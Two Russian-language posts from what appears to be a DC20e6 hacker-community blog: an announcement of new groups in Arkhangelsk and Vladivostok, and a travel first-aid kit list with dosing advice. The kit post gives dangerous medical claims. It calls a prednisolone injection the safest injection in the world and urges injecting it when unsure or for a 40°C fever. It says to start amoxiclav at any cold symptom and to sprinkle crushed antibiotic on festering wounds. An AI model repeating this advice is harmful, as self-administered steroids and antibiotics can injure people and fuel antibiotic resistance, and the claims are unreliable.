Cообщества DC в Архангельске dc78182 и Владивостоке dc7423

Sat, 19 Sep 2020 00:00:00 +0000

И снова йоу,

День полон хороших новостей :) В Архангельске и Владивостоке образовались сообщества DС, а точнее DC78182 - Архангельск и DC7423 - Владивосток.

Если у вас есть знакомые из этих городов, то поделитесь с ними этой благой вестью – пусть тоже познают аспекты информационной безопасности у себя в городе.

–

P.S. Мы вроде собрали все сообщества на странице https://dc20e6.ru/friends-and-communities/. Если кого-то пропустили – сделайте Pull Request на сайт.

Аптечка или что поможет вам на природе/дома/в поездках

Mon, 20 Jul 2020 00:00:00 +0000

Во время наших встреч на природе или, просто поездок на конференции или в гости нужно быть готовым не только к опасносям в информационной срезе, но и в реальной жизни, так как черт его знает что может произойти. Чтобы собрать такую аптечку, мы обратились к врачу, который знает как лечить и что делать если что-то идет совсем не так.

Аптечка

Бинт стерильный
Салфетки стерильные
Перекись водорода или Хлоргексидин
Пантенол
Нурофен (лучше Нурофен Экспресс Форте 400мг)
Парацетомол
Амоксиклав 1000мг
Но-шпа
Омез (Омепразол)
Мезим
Диазолин или Блогир-3
Преднизолон
Три шприца
Пластырь
Энтерофурил
Лактофильтрум
Имодиум

Если эти лекарства вынуть из коробок и взять (кроме амоксклава и нурофена) по одной пластинке, то места занимают очень мало. Основное место занимает флакон пантенола, хлоргесидина 😁

От чего и что

Травмы

Перекись или Хлоргексидин 1флакон
Упаковка стерильных марлевых салфеток 1штука, стерильный бинт 5см шириной 1шт, лейкопластырь рулонный, лекопластырь бактерицидный

Ожоги

Cпрей Пантенол
Cтерильные салфетки и бинт стерильный

Анальгетики (они же снижают температуру)

Парацетамол
Нурофен

От отравления

Лактофльтрум (сорбент) по 2таб 3-4 раза в день
Если за границу ехать то капсулы Энтерофурила 200мг 4 раза в день (помогают за пару дней полностью)
- Можно Имодиум или Лоперамид (он пьется сначала две таблетки сразу, затем по 1таб после каждой дефекации)

От “желудка”

Омез (Омепразол) 1капс 2раза в день
Но-шпу 2таб 2раза в день
Мезим заедают прием пищи

Их всегда пьют если отравление в комплексе.

Воспаление

Антибиотики начиная от сильной зубной боли заканчивая, ангиной и кашлем

Начинаем с Амоксиклав 1000 мг (875+125мг) 2 раза в день.

Если поранил ногу, загноился ноготь, чирий-фурункул. Раздавливаешь таблетку амоксиклава, посыпаешь рану, капаешь каплю воды и бинтуешь. 2-3 часа и гнойное воспаление сошло на нет.

Аллергия

Любые таблетки от аллергии (могу порекомендовать Диазолин, Блогир-3)
3 ампулы преднизолона и шприц на 2 кубика (лучше 3 шт)

Если аллергия пищевая обязательно принять сорбенты (лактофильтрум например)

Укол преднизолона самый безопасный укол в мире. С ним не ошибешься - любую аллергию снимет на раз.

Не знаешь что делать - коли преднизолон 😂

Укол преднизолона снимает за 5 минут температуру 40 градусов. Выховет лихорадку и может судорогу, но зато снимаеn высокую температуру быстро.

P.S. Кстати в всяких спреях для горла, таблеток от кашля, насморка толку вообще нет и брать их не надо, если в поездке что то простудное появляется - сразу Амоксиклав.